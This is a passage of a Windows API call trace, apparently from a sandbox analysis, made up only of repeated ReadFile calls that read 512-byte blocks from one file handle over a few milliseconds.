lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, 
lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, 
lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile 
(in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 
[0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, 
lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, 
lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: 
lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, 
lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, 